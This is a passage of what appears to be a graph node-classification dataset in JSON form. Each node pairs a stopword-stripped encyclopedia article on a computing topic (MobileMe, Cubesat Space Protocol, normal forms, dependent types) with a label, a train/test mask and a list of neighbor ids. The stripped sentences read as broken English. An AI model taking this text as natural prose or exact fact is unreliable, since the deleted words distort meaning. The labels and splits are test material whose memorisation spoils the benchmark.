mobileme also provided user email address used uploading photos videos uploads viewers gallery either iphone ipod touch me.com sent dedicated email address synced back iphoto aperture galleries could made public private could password protected iphoto imovie os x mobileme featured idisk online storage repository accessible via web browser me.com finder os x various apps ios devices remote disk microsoft windows also allowed sharing files selecting given file using me.com/idisk idisk iphone app clicking share button generated unique link file protected password could shared email another way use idisk share several files easily placing idisk public folder could also password protected users mac os x v10.5 later could use ilife '08 ilife '09 ilife '11 application iweb publish websites hosted mobileme account either domain name controlled page me.com website users without iweb could also publish websites placing files web/sites folder idisk however web host n't support server-side language php mobileme used ajax dynamic html simulate look feel desktop applications within user web browser applications me.com included mail contacts calendar gallery find iphone idisk access plus account section me.com web applications built top open source sproutcore javascript framework users could also configure features email aliases domain names iweb publish feature supported browsers me.com mac windows safari 3.1 later firefox 3.5 later internet explorer 8 internet explorer 7 windows-only safari 3.0 firefox 3.0 would run web applications fully supported mobileme accessible linux using firefox 3 despite warning would presented user upon entry success also reported using konqueror browser linux however confirmed apple mobileme users could connect aim service mac.com me.com accounts mobileme connections secured ssl encryption addition ichat users using mobileme account could encrypt chats mobileme members using ichat users could also access mobileme chat account ios devices using free paid-for versions aim app provided aol ios app supported aim protocol users wished sync mobileme data pc download install apple mobileme control panel install user first download install latest version itunes install mobileme control panel installation user signed control panel using username password could control sync settings contacts calendars bookmarks idisk settings public folder access similar manner mobileme preference panel built mobileme mail beta released may 13 2010 included many new features photo inserting font changing wide screen views much released final version june 18 2010 mobileme calendar beta released july 6 2010 mobileme calendar beta included new web application me.com redesigned day week month views well new list view make scanning events easier performance also improved also featured new sharing options allowed invited users edit shared calendar supported invitations rsvps sent email invited persons answered clicking simple link n't mobileme members also supported caldav standard compatibility multiple devices however updates came decreased functionality capability publish ical calendars publicly viewable web pages removed users wishing view public calendar manually subscribe caldav compatible calendar device compatibility microsoft outlook suffered since outlook users could sync primary outlook calendar mobileme calendar anymore way integrate mobileme outlook mobileme calendar linked caldav meant mobileme calendar always seen outlook secondary calendar alarms notifications work table illustrates pricing structure previous apple discontinuing purchases june 6 2011 part move icloud current users encouraged use mobileme services inside icloud account migration happening automatically anyway could continue use mobileme services access me.com website shut june 30 2012 although limited access beyond date available download content users wishing cancel mobileme—thus immediately end services—could gain full refunds purchased within 45 days june 6 2011 partial refunds purchased 46 days however unclear whether refund policy applied icloud service launched fall 2011 mobileme like .mac itools closely integrated mobileme account extended functions many programs mostly within ilife suite notably idisk could mounted volume desktop furthermore possible mount public portion another user idisk mechanism one early ways receive free software part .mac possible queue files upload offline idisk though uploaded idisk mounted idisk commands located go menu finder additionally address book entries ical events to-do entries safari bookmarks keychains mail accounts mail rules mail signatures smart mailboxes could synced idisk allowing easy synchronization multiple computers iweb allowed users create web pages could uploaded idisk published iphoto could used one-click web-publishing photo albums ical could used publish calendars web also backup software could used make backups idisk local media prior .mac service iphoto imovie garageband itunes libraries could easily uploaded idisk subject various licensing agreements mobileme integrated various applications ios devices included ical syncing calendar address book syncing contacts mail syncing across devices safari bookmarks syncing across devices apple later introduced mobileme idisk app july 29 2009 mobileme gallery app january 14 2010 find iphone app june 18 2010 allowed mobile access find iphone feature initially available mobileme users later made free ios device users initially iphone ipod touch apps following updates made universal app compatible iphone ipod touch ipad august 2010 apple introduced feature allowed users stream music stored idisk background device subdirectory private subdomain public access points mobileme user individual account functions provided direct web access mobileme user account via links function directly see list private public original collection internet software services known icloud first called itools released january 5 2000 made available free charge mac users services offered itools included first availability mac.com email addresses could accessed email client e.g mail app icards free greeting card service ireview collection reviews popular web sites homepage free web page publishing service first version idisk online data storage system kidsafe directory family-friendly web sites itools primarily mac-only offering provided limited discussion board-based technical support however features itools accessible via non-mac platforms although mac required create account example modifying homepage content possible using web browser windows via linux although original version idisk used appleshare ip transport required eventually updated use webdav technology therefore opened access non-mac operating systems apple even offered application use windows xp costs rose particularly due idisk storage space wide demand mac.com email accounts increasing support needs itools renamed .mac july 17 2002 subscription-based suite services dedicated technical support team .mac offered several tools subscribers including upgraded versions homepage personal web hosting service idisk online disk storage service mac.com email service provider offering pop imap protocols icards online greeting card service new services offered .mac included backup personal backup solution allowed users archive data idisk cd dvd mcafee virex virus scanner given .mac subscribers june 15 2005 apple announced september 17 2002 100,000 people subscribed .mac since launch earlier year existing itools accounts transitioned .mac accounts free trial period ended september 30 2002 move generated mixed reaction among mac users believing .mac overpriced .mac occasionally received new features october 2006 apple launched update .mac mail service whose interface close mac os x mail new functionality built top ajax provided drag-and-drop live-updating three-way split view ability resize panels v10.5 leopard used .mac provide dynamic dns services back mac feature remote desktop service august 7 2007 apple ceo steve jobs announced new features .mac including new web gallery feature similar combination features flickr youtube .mac account came 10 gb storage space could divided email storage mac.com email address user idisk account preference allowed user decide much storage space allocate either service see fit users wanted additional storage capacity could buy total 30 gb higher annual fee storage space email idisk could used way user wanted subject terms .mac license agreement .mac also offered boxed version available stores online physical product box contained activation code entered registering renewing subscription initial speculation new service replace .mac came early june 2008 apple bought me.com domain name june 9 2008 apple announced .mac would replaced mobileme launched july 9 2008 mac.com taken offline 08:00 12:00 day mobileme service went live 20:00 02:00 pacific time mobileme taken offline short time later leaving customers redirected mobileme information page option log several hours infrequent service mobileme officially went live july 11 2008 several .mac features removed transition mobileme launch mobileme plagued various issues mobileme .mac successor initially criticized launch unstable syncing problems reports users unable access mail functions mobileme suspected related .mac mobileme switch-over free trial mobileme inadvertently charged australian european customers ’ credit cards leading apple issue refunds extend free trial four months problems switching .mac accounts issues apple created status news page revamped support page initial versions windows mobileme control panel allowed synchronization corporate outlook accounts mobileme mid-2008 update control panel removed ability synchronize outlook mobileme outlook using microsoft exchange server calendars contacts according apple support design bug fixed support synchronizing even standalone outlook tasks notes mobileme may 2011 fortune magazine reported summer 2008 mobileme launched mostly negative reviews apple ceo steve jobs summoned mobileme team meeting town hall auditorium 4 infinite loop asking mobileme supposed someone answered jobs reportedly shot back fuck n't internal email sent apple employees august 4 2008 jobs admitted mobileme launched hurriedly “ apple ’ standards ” wrote “ mistake launch mobileme time iphone 3g iphone 2.0 software app store ” august 18 2008 announced mobileme subscribers would offered 60-day extension addition one-month extension previously offered early 2011 onwards mobileme retail boxes began removed entirely sale apple stores stock slowly discontinued stores june 6 2011 users prevented subscribing renewing mobileme service via apple website june 6 2011 wwdc 2011 icloud release announced sometime fall 2011 entirely replacing mobileme service would discontinued however would continue run concurrently current mobileme subscribers june 30 2012 mobileme perceived public failings steve jobs anticipated skepticism claim icloud works asked rhetorically believe 're ones brought mobileme october 12 2011 alongside release ios 5 iphone 4s icloud released new users current mobileme subscribers able move icloud either immediately anytime june 30 2012 mobileme would permanently discontinued except limited download abilities addition mobileme email calendar services icloud syncs files across multiple devices promised wwdc 2011 apple began service fall 2011 giving every user either ios 5 mac os x lion 5 gb cloud data storage basic service free point usage additional paid-for tiers data storage also available me.com retained default email domain address new icloud users year later around fall 2012 apple started sign-up new users free icloud.com email addresses previous me.com users also able continue using email domain concurrently done previous service changes first step apple sent 30 days left emails existing users mobileme june 1 2012 followed 7 days left emails june 23 2012 advising users download photos files mobileme ends june 30 remember download gallery photos idisk files move iweb sites date previously advertised apple following announcement icloud year earlier main mobileme service discontinued june 30 2012 services moved icloud users expected moved new service already given year notice one exception mobileme gallery idisk services still limited downloading abilities remaining online portal showing banners mobileme ended either still download files limited time idisk page download photos gallery page complete shut-down mobileme occurred july 31 2012 mobileme closed banner showing homepage redirect link icloud ios apps gallery idisk also ceased operating june 30 2012 mobileme later removed system preferences os x release os x mountain lion july 25 2012",
    "neighbors": [
      10755,
      9732,
      1549,
      4111,
      5647,
      7697,
      11285,
      11289,
      7713,
      8740,
      6186,
      4139,
      6700,
      1074,
      8754,
      2101,
      9784,
      8253,
      576,
      5696,
      9802,
      8783,
      1620,
      4180,
      3670,
      1623,
      3672,
      10838,
      3167,
      3681,
      4194,
      9826,
      5733,
      8806,
      3691,
      2673,
      2676,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      2695,
      8842,
      6797,
      8336,
      5784,
      1177,
      4251,
      3228,
      2207,
      10406,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      704,
      713,
      3790,
      7378,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      6377,
      2282,
      9451,
      1772,
      4844,
      10478,
      7928,
      8441,
      7420,
      2819,
      11011,
      1290,
      1802,
      9999,
      784,
      10512,
      4888,
      5912,
      3879,
      10023,
      3371,
      4399,
      7983,
      9519,
      823,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      9035,
      2388,
      4957,
      6495,
      9063,
      4457,
      10602,
      3948,
      11629,
      10608,
      2439,
      6023,
      6539,
      6028,
      7052,
      1428,
      3483,
      2979,
      9123,
      11171,
      11173,
      8109,
      2492,
      446,
      7614,
      8644,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      467,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      2023,
      488,
      8170,
      7154,
      5619,
      11257,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 5785,
    "label": 5,
    "text": "Cubesat_Space_Protocol:cubesat space protocol cubesat space protocol csp small network-layer delivery protocol designed cubesats idea developed group students aalborg university 2008 developed aausat3 cubesat mission launched 2013 protocol based 32-bit header containing network transport layer information implementation designed embedded systems 8-bit avr microprocessor 32-bit arm avr atmel implementation written c ported run freertos posix pthreads-based operating systems linux support mac os x microsoft windows available version 1.1 three-letter acronym csp adopted abbreviation space protocol first mac-layer driver written can-bus physical layer since extended include several technologies name therefore extended general cubesat space protocol without changing abbreviation protocol implementation actively maintained students aalborg university spin-off company gomspace source code available lgpl license hosted github cubesat space protocol enables distributed embedded systems deploy service-oriented network topology layering csp corresponds layers tcp/ip model implementation supports connection oriented transport protocol layer 4 router-core layer 3 several network-interfaces layer 1–2 service-oriented topology eases design satellite subsystems since communication bus interface subsystems means subsystem developer needs define service-contract set port-numbers system responding furthermore subsystem inter-dependencies reduced redundancy easily added adding multiple similar nodes communication bus key features include csp compile platforms recent version gcc compiler csp requires support c99 features inline functions designated initializers csp supports several physical layer technologies lgpl licensed source code contains implementation fragmenting interface drivers socketcan atmel at90can128 at91sam7a1 at91sam7a3 processors version 1.1 onwards csp also includes interfaces i2c rs-232 interfaces need implement function transmit packet insert received packets protocol stack csp_new_packet function csp successfully tested following physical layers port range divided three adjustable segments ports 0 7 used general services ping buffer status implemented csp service handler ports 8 47 used subsystem specific services remaining ports 48 63 ephemeral ports used outgoing connections bits 28 31 used marking packets hmac xtea encryption rdp header crc32 checksum",
    "neighbors": [
      7170,
      9251,
      8554,
      5356,
      6797,
      7983,
      499,
      2517,
      1462,
      823,
      11221,
      11413,
      5402,
      3740,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5786,
    "label": 3,
    "text": "ARM_Cortex-A:arm cortex-a arm cortex-a group 32-bit 64-bit risc arm processor cores licensed arm holdings cores intended application use group consists 32-bit cores arm cortex-a5 arm cortex-a7 arm cortex-a8 arm cortex-a9 arm cortex-a12 arm cortex-a15 arm cortex-a17 mpcore arm cortex-a32 64-bit cores arm cortex-a35 arm cortex-a53 arm cortex-a55 arm cortex-a57 arm cortex-a72 arm cortex-a73 arm cortex-a75 arm cortex-a76 32-bit arm cortex-a cores except cortex-a32 implement armv7-a profile armv7 architecture main distinguishing feature armv7-a profile compared two profiles armv7-r profile implemented arm cortex-r cores armv7-m profile implemented arm cortex-m cores armv7-a profile includes memory management unit mmu many modern operating systems require mmu run 64-bit arm cortex-a cores well 32-bit arm cortex-a32 implement armv8-a profile armv8 architecture arm holdings neither manufactures sells cpu devices based designs rather licenses processor architecture interested parties arm offers variety licensing terms varying cost deliverables licensees arm provides integratable hardware description arm core well complete software development toolset right sell manufactured silicon containing arm cpu integrated device manufacturers idm receive arm processor ip synthesizable rtl written verilog form ability perform architectural level optimizations extensions allows manufacturer achieve custom design goals higher clock speed low power consumption instruction set extensions optimizations size debug support etc determine components included arm ic chip consult manufacturer datasheet related documentation cortex-a5 a7 a8 a9 a12 a15 a17 cores implement armv7-a architecture cortex-a32 a35 a53 a57 a72 a73 a75 a76 cores implement armv8-a architecture amount documentation arm chips daunting especially newcomers documentation microcontrollers past decades would easily inclusive single document chips evolved documentation grown total documentation especially hard grasp arm chips since consists documents ic manufacturer documents cpu core vendor arm holdings typical top-down documentation tree ic manufacturers usually additional documents including evaluation board user manuals application notes getting started development software software library documents errata",
    "neighbors": [
      7170,
      8720,
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      3630,
      9774,
      2097,
      8250,
      8253,
      6207,
      7745,
      7235,
      7747,
      2635,
      99,
      8812,
      11374,
      10361,
      638,
      644,
      8842,
      146,
      659,
      1170,
      7833,
      666,
      4258,
      4773,
      9391,
      9913,
      8383,
      10945,
      9928,
      4821,
      2788,
      3301,
      9964,
      6391,
      3835,
      2814,
      781,
      5417,
      2862,
      7988,
      11062,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      11125,
      8058,
      392,
      1428,
      4508,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      4569,
      2524,
      9182,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 5787,
    "label": 1,
    "text": "Rodovid:rodovid rodovid free online collaborative family tree portal originally ukrainian project 2012 active communities 25 languages provides web service built using mediawiki rodovid engine software help store visualize family relationships rodovid founded september 2005 group developers genealogy enthusiasts kiev ukraine name comes ukrainian word rodovid meaning lineage genealogy 2015 rodovid 1,001,000 total records individuals across languages including 290,000 ukrainian russian making second largest free genealogy service online largest language english 2016 rodovid ranked 82 top 100 genealogy websites 2016 genealogyintime magazine experimented supporting imports gedcom files engine software proprietary discussions releasing openly supports layouts family trees optimised browsing printing claims generate trees thousands people seconds rodovid project data descriptions stored servers kiev available creative commons attribution license already public domain data periodically archived wikiteam project internet archive",
    "neighbors": [
      467,
      10020,
      8845,
      735
    ],
    "mask": "None"
  },
  {
    "node_id": 5788,
    "label": 5,
    "text": "GetSimple_CMS:getsimple cms getsimple cms free web content management system primary goal simple easy use based programming language php uses xml files store content flat file content management system contrast cms software tend use databases mysql getsimple cms created 2009 resident pittsburgh pa us web developer chris cagle still presides project senior developer claims created getsimple cms need cms powerful wordpress use easier since developers joined getsimple team active community contributes plug-ins translations themes getsimple cms primarily developed creation smaller websites however also suitable medium large websites thanks extendability platform via plug-ins themes target groups cms organizations companies individuals need small medium-sized websites according statistics w3tech getsimple cms used less 0.1 sites internet simple installation process copying files web server start installation routine allows immediate use software web hosts offer cms already pre-installed installed software expanded numerous plug-ins themes getsimple cms downloaded 120,000 times march 2013 magazine t3n assigns getsimple micro minimal-cms one praises simplicity yet possible extensibility plug-ins author article states theming concept getsimple belong intuitive ever seen british magazine computer active raises backup function simplicity cleanliness work surface well supplied templates produced content manager magazine dedicated cms detailed presentation took 2012 next typo3 wordpress comparison 15 open source cms hot scripts counted cms may 2010 ten easiest lightest weight scripts web design shack counts among 50 wordpress alternatives ranks eighth demo specialized installations page opensourcecms.com counted getsimple 30 common best-rated systems stand 2013 german-speaking community dedicated language english separate area official forum",
    "neighbors": [
      225,
      8644,
      5612,
      7022,
      7983,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 5789,
    "label": 8,
    "text": "WS-Coordination:ws-coordination ws-coordination web services specification developed bea systems ibm microsoft accepted oasis web services transaction tc 1.2 version describes extensible framework providing protocols coordinate actions distributed applications coordination protocols used support number applications including need reach consistent agreement outcome distributed transactions framework defined specification enables application service create context needed propagate activity services register coordination protocols framework enables existing transaction processing workflow systems coordination hide proprietary protocols operate heterogeneous environment additionally ws-coordination describes definition structure context requirements propagating context cooperating services however specification n't enough coordinate transactions among web services provides coordination framework specifications like ws-atomic transaction ws-businessactivity needed purpose",
    "neighbors": [
      10020,
      7878,
      489,
      4107,
      3323,
      5782,
      119,
      1851
    ],
    "mask": "Test"
  },
  {
    "node_id": 5790,
    "label": 9,
    "text": "Not_eXactly_C:exactly c exactly c nxc high-level programming language lego mindstorms nxt designed john hansen 2006 nxc short exactly c based next byte codes assembly language nxc syntax like c. ide nxc bricx command center nxc compiler available mozilla public license sample code shown",
    "neighbors": [
      477,
      6802,
      10964,
      9748,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 5791,
    "label": 7,
    "text": "Cloudike:cloudike cloudike brandable file storage platform operated cloudike inc. headquartered san jose california platform provides cloud storage file synchronization contact synchronization personal cloud client software company data storage approach similar dropbox google drive apple icloud store user data provide access files smartphones laptops tablets etc main difference apart functionality end-users cloudike personal cloudike offers customization businesses cloudike enterprise brands widely known white-label cloudike started 2013 saas-platform grew multi-tier cloud solution used build white-label enterprise data storages oems mobile internet service providers platform modules enterprise data administration storage api integration billing systems cloudike enables building large-scale file storages based openstack swift amazon s3 storage systems compatible amazon s3 apis synchronize user files server cloudike provides desktop clients windows macos android ios devices cloudike offers mobile clients files contact lists accessed via web browser data updates synchronized computers mobile devices associated user accounts cloudike based set programmatic interfaces apis written python uses python frameworks django tornado create rest api message broker software rabbitmq mongodb build contact synchronization mechanism cloudike utilizes sabredav framework web-frontend part single page application based angularjs end-user features enterprise modules several cloud platforms provide white-label services similar cloudike list contains cloud storage platforms might directly indirectly compete cloudike",
    "neighbors": [
      11201,
      4194,
      9762,
      7364,
      3462,
      2695,
      4490,
      8554,
      1295,
      4623,
      7409,
      7983,
      467,
      8691,
      10168,
      1083,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 5792,
    "label": 1,
    "text": "Boyce–Codd_normal_form:boyce–codd normal form boyce–codd normal form bcnf 3.5nf normal form used database normalization slightly stronger version third normal form 3nf bcnf developed 1975 raymond f. boyce edgar f. codd address certain types anomalies dealt 3nf originally defined relational schema bcnf redundancy based functional dependency removed although types redundancy may still exist relational schema r boyce–codd normal form every one dependencies x → least one following conditions hold rare cases 3nf table meet requirements bcnf 3nf table multiple overlapping candidate keys guaranteed bcnf depending functional dependencies 3nf table two overlapping candidate keys may may bcnf example 3nf table meet bcnf table superkeys note even though table start time end time attributes duplicate values still admit days two different bookings court 1 court 2 could start time end time reason start time end time considered table superkeys however candidate keys minimal superkeys relation e.g ⊂ candidate key recall 2nf prohibits partial functional dependencies non-prime attributes i.e. attribute occur candidate key see candidate keys 3nf prohibits transitive functional dependencies non-prime attributes candidate keys today court bookings table non-prime attributes attributes belong candidate key therefore table adheres 2nf 3nf table adhere bcnf dependency rate type → court determining attribute rate type court depends 1 neither candidate key superset candidate key 2 court subset rate type dependency rate type → court respected since rate type ever apply single court design amended meets bcnf candidate keys rate types table rate type court member flag candidate keys today bookings table court start time court end time tables bcnf rate type key rate types table one rate type associated two different courts impossible using rate type key rate types table anomaly affecting original table eliminated cases non-bcnf table decomposed tables satisfy bcnf preserve dependencies held original table beeri bernstein showed 1979 example set functional dependencies ab → c c → b represented bcnf schema consider following non-bcnf table whose functional dependencies follow ab → c c → b pattern person shop type combination table tells us shop type geographically nearest person home assume simplicity single shop one type candidate keys table three attributes prime attributes i.e belong candidate keys table 3nf table bcnf however shop type attribute functionally dependent non-superkey nearest shop violation bcnf means table subject anomalies example eagle eye might shop type changed optometrist fuller record retaining shop type optician davidson record would imply contradictory answers question eagle eye shop type holding shop shop type would seem preferable would prevent anomalies occurring revised design shop near person table candidate key person shop shop table candidate key shop unfortunately although design adheres bcnf unacceptable different grounds allows us record multiple shops type person words candidate keys guarantee functional dependency person shop type → shop respected design eliminates anomalies conform bcnf possible design introduces new normal form known elementary key normal form design consists original nearest shops table supplemented shop table described table structure generated bernstein schema generation algorithm actually eknf although enhancement 3nf recognized time algorithm designed referential integrity constraint defined effect shop type nearest shop first table must refer shop type shop second table data anomalies described previously prevented np-complete given database schema third normal form determine whether violates boyce-codd normal form chris date pointed definition know bcnf appeared paper ian heath 1971 date writes since definition predated boyce codd definition three years seems bcnf ought rights called heath normal form n't edgar f. codd released original paper relational model data large shared databanks june 1970 first time notion relational database published work including boyce-codd normal form method based relational model",
    "neighbors": [
      10560,
      5794,
      5795,
      2022,
      6983,
      2024,
      2025,
      2026,
      7080,
      946,
      4281,
      3004,
      6782
    ],
    "mask": "Test"
  },
  {
    "node_id": 5793,
    "label": 3,
    "text": "Cellular_architecture:cellular architecture cellular architecture type computer architecture prominent parallel computing cellular architectures relatively new ibm cell microprocessor first one reach market cellular architecture takes multi-core architecture design logical conclusion giving programmer ability run large numbers concurrent threads within single processor 'cell compute node containing thread units memory communication speed-up achieved exploiting thread-level parallelism inherent many applications cell cellular architecture containing 9 cores processor used playstation 3 another prominent cellular architecture cyclops64 massively parallel architecture currently development ibm cellular architectures follow low-level programming paradigm exposes programmer much underlying hardware allows programmer greatly optimize code platform time makes difficult develop software",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      9331,
      630,
      8822,
      6268,
      3197,
      7313,
      6815,
      8352,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      8937,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      3323,
      8700,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      466,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 5794,
    "label": 1,
    "text": "Sixth_normal_form:sixth normal form sixth normal form 6nf term relational database theory used two different ways christopher j date others defined sixth normal form normal form based extension relational algebra relational operators join generalized support natural treatment interval data sequences dates moments time instance temporal databases sixth normal form based generalized join follows relvar r table sixth normal form abbreviated 6nf satisfies nontrivial join dependencies — join dependency trivial least one projections possibly u_projections involved taken set attributes relvar table concerned date et al also given following definition relvar r sixth normal form 6nf every jd join dependency r trivial — jd trivial one components equal pertinent heading entirety relation 6nf also 5nf sixth normal form intended decompose relation variables irreducible components though may relatively unimportant non-temporal relation variables important dealing temporal variables interval data instance relation comprises supplier name status city may also want add temporal data time values valid e.g. historical data three values may vary independently different rates may instance wish trace history changes status review production costs may reveal change caused supplier changing city hence charged delivery discussion temporal aggregation sql see also zimanyi different approach see tsql2 authors used term sixth normal form differently synonym domain/key normal form dknf usage predates date et al work sixth normal form currently used data warehouses benefits outweigh drawbacks example using anchor modeling although using 6nf leads explosion tables modern databases prune tables select queries using process called 'table elimination required thus speed queries access several attributes order table 6nf comply 5nf first requires table satisfies trivial join dependencies let ’ take simple example table already 5nf users table every attribute non null primary key username users_table table 5nf join dependency implied unique candidate key table username specifically possible join dependencies username status username department 6nf version would look like users users_dept one table 5nf 6nf produces two tables following another example table 1 join dependencies table medic name occupation medic name practice years practice years type hence could see table 2nf due appearance transitive dependency following tables try bring 6nf table 2.1 table 2.2 table 2.3",
    "neighbors": [
      5151,
      5792,
      5795,
      9893,
      4281,
      3001,
      3004,
      2369,
      9286,
      6983,
      5320,
      2512,
      2901,
      7767,
      2022,
      2024,
      2025,
      2026,
      6782
    ],
    "mask": "Test"
  },
  {
    "node_id": 5795,
    "label": 1,
    "text": "Fifth_normal_form:fifth normal form fifth normal form 5nf also known project-join normal form pj/nf level database normalization designed reduce redundancy relational databases recording multi-valued facts isolating semantically related multiple relationships table said 5nf every non-trivial join dependency table implied candidate keys join dependency b … z r implied candidate key r b … z superkey r. fifth normal form first described ronald fagin 1979 conference paper normal forms relational database operators consider following example table predicate products type designated product type made brand designated brand available traveling salesman designated traveling salesman primary key composite three columns also note table 4nf since multivalued dependencies 2-part join dependencies table column candidate key superkey determinant two columns absence rules restricting valid possible combinations traveling salesman brand product type three-attribute table necessary order model situation correctly suppose however following rule applies traveling salesman certain brands certain product types repertoire brand b1 brand b2 repertoire product type p repertoire assuming brand b1 brand b2 make product type p traveling salesman must offer products product type p made brand b1 made brand b2 case possible split table three case impossible louis ferguson refuse offer vacuum cleaners made acme assuming acme makes vacuum cleaners sells anything else made acme lava lamp also sells vacuum cleaners made brand robusto note setup helps remove redundancy suppose jack schneider starts selling robusto products breadboxes vacuum cleaners previous setup would add two new entries one product type jack schneider robusto breadboxes jack schneider robusto vacuum cleaners new setup need add single entry jack schneider robusto brands traveling salesman rare situations 4nf table conform 5nf situations complex real-world constraint governing valid combinations attribute values 4nf table implicit structure table table normalized 5nf burden maintaining logical consistency data within table must carried partly application responsible insertions deletions updates heightened risk data within table become inconsistent contrast 5nf design excludes possibility inconsistencies table fifth normal form 5nf project-join normal form pjnf lossless decomposition number smaller tables case smaller tables decomposition candidate key table excluded",
    "neighbors": [
      5792,
      5794,
      2022,
      6983,
      2024,
      2025,
      2026,
      10737,
      244,
      4281,
      3004,
      6782
    ],
    "mask": "None"
  },
  {
    "node_id": 5796,
    "label": 9,
    "text": "Dependent_type:dependent type computer science logic dependent type type whose definition depends value overlapping feature type theory type systems intuitionistic type theory dependent types used encode logic quantifiers like exists functional programming languages like agda ats coq f* epigram idris dependent types may help reduce bugs enabling programmer assign types restrain set possible implementations two common examples dependent types dependent functions dependent pairs return type dependent function may depend value type one arguments instance function takes positive integer formula_1 may return array length formula_1 array length part type array note different polymorphism generic programming include type argument dependent pair may second value type depends first value sticking array example dependent pair may used pair array length type-safe way dependent types add complexity type system deciding equality dependent types program may require computations arbitrary values allowed dependent types deciding type equality may involve deciding whether two arbitrary programs produce result hence type checking may become undecidable dependent types created deepen connection programming logic 1934 haskell curry noticed types used typed lambda calculus combinatory logic counterpart followed pattern axioms propositional logic going every proof logic matching function term programming language one curry examples correspondence simply typed lambda calculus intuitionistic logic predicate logic extension propositional logic adding quantifiers howard de bruijn extended lambda calculus match powerful logic creating types dependent functions correspond dependent pairs correspond exists loosely speaking dependent types similar type indexed family sets formally given type formula_4 universe types formula_5 one may family types formula_6 assigns term formula_7 type formula_8 say type b varies function whose type return value varies argument i.e fixed codomain dependent function type function called dependent product type pi-type dependent function type example dependent function type typically written formula_9 formula_10 formula_6 constant function corresponding dependent product type equivalent ordinary function type formula_12 judgmentally equal formula_13 b depend x name 'pi-type comes idea may viewed cartesian product types pi-types also understood models universal quantifiers example write formula_14 n -tuples real numbers formula_15 would type function given natural number n returns tuple real numbers size n usual function space arises special case range type actually depend input e.g formula_16 type functions natural numbers real numbers written formula_17 typed lambda calculus dual dependent product type dependent pair type dependent sum type sigma-type confusingly dependent product type sigma-types also understood existential quantifiers continuing example universe types formula_5 type formula_4 family types formula_6 dependent pair type formula_22 dependent pair type captures idea ordered pair type second term dependent value first formula_23 formula_7 formula_25 b constant function dependent pair type becomes judgementally equal product type ordinary cartesian product formula_26 let formula_4 type let formula_6 curry–howard correspondence b interpreted logical predicate terms given formula_7 whether type b inhabited indicates whether satisfies predicate correspondence extended existential quantification dependent pairs proposition formula_30 true type formula_31 inhabited example formula_32 less equal formula_33 exists another natural number formula_34 k n logic statement codified existential quantification formula_35 proposition corresponds dependent pair type formula_36 proof statement less n pair contains positive number k difference n proof equality k n henk barendregt developed lambda cube means classifying type systems along three axes eight corners resulting cube-shaped diagram correspond type system simply typed lambda calculus least expressive corner calculus constructions expressive three axes cube correspond three different augmentations simply typed lambda calculus addition dependent types addition polymorphism addition higher kinded type constructors functions types types example lambda cube generalized pure type systems system formula_37 pure first order dependent types corresponding logical framework lf obtained generalising function space type simply typed lambda calculus dependent product type system formula_38 second order dependent types obtained formula_37 allowing quantification type constructors theory dependent product operator subsumes formula_40 operator simply typed lambda calculus formula_41 binder system f. higher order system formula_42 extends formula_38 four forms abstraction lambda cube functions terms terms types types terms types types terms system corresponds calculus constructions whose derivative calculus inductive constructions underlying system coq proof assistant curry–howard correspondence implies types constructed express arbitrarily complex mathematical properties user supply constructive proof type inhabited i.e. value type exists compiler check proof convert executable computer code computes value carrying construction proof checking feature makes dependently typed languages closely related proof assistants code-generation aspect provides powerful approach formal program verification proof-carrying code since code derived directly mechanically verified mathematical proof",
    "neighbors": [
      4101,
      1931,
      6414,
      5521,
      5783,
      3736,
      10649,
      11674,
      5920,
      10145,
      3876,
      5885,
      428,
      6188,
      5806,
      9008,
      3765,
      6070,
      4791,
      7479,
      11574,
      8251,
      10684,
      8511,
      963,
      6087,
      5961,
      10953,
      11641,
      11212,
      8397,
      11219,
      5588,
      3926,
      7894,
      4057,
      10586,
      4955,
      4572,
      8924,
      8926,
      6239,
      10460,
      10083,
      4069,
      6640,
      5365,
      3702,
      1016,
      3577,
      9466,
      1019,
      2556,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5797,
    "label": 7,
